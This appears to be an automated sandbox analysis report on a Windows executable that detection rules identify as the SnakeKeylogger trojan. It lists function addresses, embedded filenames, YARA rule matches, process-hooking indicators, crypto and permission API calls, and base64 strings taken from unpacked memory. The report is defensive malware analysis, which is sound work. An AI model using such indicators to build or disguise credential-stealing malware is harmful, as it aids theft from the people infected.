Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030ED599	3_2_030ED599
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030EC46C	3_2_030EC46C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030ECA08	3_2_030ECA08
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030E69A0	3_2_030E69A0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030ECFF8	3_2_030ECFF8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030E3E09	3_2_030E3E09
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030EEC18	3_2_030EEC18
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030E29E0	3_2_030E29E0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030EEC0A	3_2_030EEC0A
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBBF08	3_2_06FBBF08
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB5C88	3_2_06FB5C88
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB7288	3_2_06FB7288
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB63A8	3_2_06FB63A8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBD6F0	3_2_06FBD6F0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBBEF7	3_2_06FBBEF7
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBD6E0	3_2_06FBD6E0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBD6E5	3_2_06FBD6E5
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB4ED8	3_2_06FB4ED8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEED8	3_2_06FBEED8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEED0	3_2_06FBEED0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEED4	3_2_06FBEED4
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB36C8	3_2_06FB36C8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB4ECF	3_2_06FB4ECF
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEECC	3_2_06FBEECC
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB36C3	3_2_06FB36C3
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEEC7	3_2_06FBEEC7
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB1FF8	3_2_06FB1FF8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB57F8	3_2_06FB57F8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB3FE8	3_2_06FB3FE8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB1FEF	3_2_06FB1FEF
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB57EF	3_2_06FB57EF
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB3FE7	3_2_06FB3FE7
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB7750	3_2_06FB7750
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB7740	3_2_06FB7740
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8F38	3_2_06FB8F38
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8F34	3_2_06FB8F34
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8F28	3_2_06FB8F28
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBA720	3_2_06FBA720
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBA711	3_2_06FBA711
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB1710	3_2_06FB1710
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBBF01	3_2_06FBBF01
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB1707	3_2_06FB1707
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB04D0	3_2_06FB04D0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB04C7	3_2_06FB04C7
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB2488	3_2_06FB2488
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB4478	3_2_06FB4478
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB5C78	3_2_06FB5C78
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB247F	3_2_06FB247F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB446F	3_2_06FB446F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB7C18	3_2_06FB7C18
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB7C0F	3_2_06FB7C0F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB9400	3_2_06FB9400
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB0DF0	3_2_06FB0DF0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB0DE7	3_2_06FB0DE7
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB2DA8	3_2_06FB2DA8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB85A8	3_2_06FB85A8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB85A4	3_2_06FB85A4
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8599	3_2_06FB8599
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB2D9F	3_2_06FB2D9F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB9D90	3_2_06FB9D90
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB9D8D	3_2_06FB9D8D
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB9D80	3_2_06FB9D80
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBB578	3_2_06FBB578
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBB570	3_2_06FBB570
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBCD60	3_2_06FBCD60
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBB567	3_2_06FBB567
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBCD5C	3_2_06FBCD5C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBCD54	3_2_06FBCD54
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE548	3_2_06FBE548
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBCD4F	3_2_06FBCD4F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE544	3_2_06FBE544
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE53C	3_2_06FBE53C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE537	3_2_06FBE537
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB1280	3_2_06FB1280
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB127B	3_2_06FB127B
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB727F	3_2_06FB727F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8A70	3_2_06FB8A70
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8A6C	3_2_06FB8A6C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8A64	3_2_06FB8A64
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBA258	3_2_06FBA258
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB8A5F	3_2_06FB8A5F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBA254	3_2_06FBA254
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB4A48	3_2_06FB4A48
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBA248	3_2_06FBA248
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBA24D	3_2_06FBA24D
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBBA40	3_2_06FBBA40
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB4A47	3_2_06FB4A47
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB3238	3_2_06FB3238
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBBA3C	3_2_06FBBA3C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBBA31	3_2_06FBBA31
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBD228	3_2_06FBD228
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB322F	3_2_06FB322F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBD218	3_2_06FBD218
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBD21C	3_2_06FBD21C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEA10	3_2_06FBEA10
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEA0C	3_2_06FBEA0C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEA00	3_2_06FBEA00
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBEA04	3_2_06FBEA04
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB93F8	3_2_06FB93F8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBABE8	3_2_06FBABE8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB93EF	3_2_06FB93EF
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBABE4	3_2_06FBABE4
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBABDC	3_2_06FBABDC
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBC3D0	3_2_06FBC3D0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBABD7	3_2_06FBABD7
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBC3CC	3_2_06FBC3CC
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBC3C4	3_2_06FBC3C4
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBDBB8	3_2_06FBDBB8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBC3BF	3_2_06FBC3BF
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBDBB0	3_2_06FBDBB0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBDBA8	3_2_06FBDBA8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBDBAD	3_2_06FBDBAD
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBF3A0	3_2_06FBF3A0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBF39C	3_2_06FBF39C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBF391	3_2_06FBF391
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBF394	3_2_06FBF394
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB1B68	3_2_06FB1B68
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB5368	3_2_06FB5368
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB3B58	3_2_06FB3B58
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB1B5F	3_2_06FB1B5F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB535F	3_2_06FB535F
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB3B49	3_2_06FB3B49
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB80E0	3_2_06FB80E0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB80DF	3_2_06FB80DF
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB98C8	3_2_06FB98C8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB98B8	3_2_06FB98B8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB98BC	3_2_06FB98BC
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBB0B0	3_2_06FBB0B0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBB0AC	3_2_06FBB0AC
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBB0A0	3_2_06FBB0A0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBC898	3_2_06FBC898
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBC888	3_2_06FBC888
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE080	3_2_06FBE080
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE078	3_2_06FBE078
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE07C	3_2_06FBE07C
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE071	3_2_06FBE071
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBE074	3_2_06FBE074
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBF868	3_2_06FBF868
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBF861	3_2_06FBF861
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FBF857	3_2_06FBF857
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB0040	3_2_06FB0040
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB003B	3_2_06FB003B
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB0960	3_2_06FB0960
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB0957	3_2_06FB0957
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB2918	3_2_06FB2918
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_06FB2917	3_2_06FB2917

Source: UqdykLLTA2.exe, 00000000.00000002.1274894012.000000000352D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000000.00000002.1273785587.000000000134E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000000.00000002.1280737516.000000000BD90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000000.00000000.1241346901.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameoYJA.exe< vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000003.00000002.3712836293.0000000001387000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe, 00000003.00000002.3712524269.000000000043C000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs UqdykLLTA2.exe
Source: UqdykLLTA2.exe	Binary or memory string: OriginalFilenameoYJA.exe< vs UqdykLLTA2.exe

Source: UqdykLLTA2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: UqdykLLTA2.exe PID: 5880, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: UqdykLLTA2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, jW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, jW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, -R-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, jW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, jW.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, -R-.cs	Base64 encoded string: 'rFj51hzTeDKXAHk4x2M7Rn97FogUA8nI3ZaQ8vHDilMhMV3gp+As5w==', 'Spm992E313fSbY5NiAI++96f46zzQ4rWZMrJrVgeO2ZPAMMyJRZuntKcMKKK3uV2'
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, -R-.cs	Base64 encoded string: 'rFj51hzTeDKXAHk4x2M7Rn97FogUA8nI3ZaQ8vHDilMhMV3gp+As5w==', 'Spm992E313fSbY5NiAI++96f46zzQ4rWZMrJrVgeO2ZPAMMyJRZuntKcMKKK3uV2'

Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UqdykLLTA2.exe.bd90000.6.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, QnmRDFJR3fB8REvONB.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
